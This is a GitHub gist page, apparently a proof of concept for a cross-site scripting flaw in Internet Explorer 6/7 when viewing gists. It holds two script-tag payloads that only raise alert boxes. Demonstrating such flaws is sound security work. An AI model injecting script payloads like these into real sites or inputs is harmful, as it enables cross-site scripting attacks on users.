Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@reinforchu
Last active July 18, 2022 21:33
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save reinforchu/d756a6b1f6334d6882ae to your computer and use it in GitHub Desktop.
Save reinforchu/d756a6b1f6334d6882ae to your computer and use it in GitHub Desktop.
IE6/7 gist XSS (Internet Explorer vulnerability)
<script>alert('gist XSS')</script>
<script>alert(location.href)</script>
@reinforchu
Copy link
Author

default

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment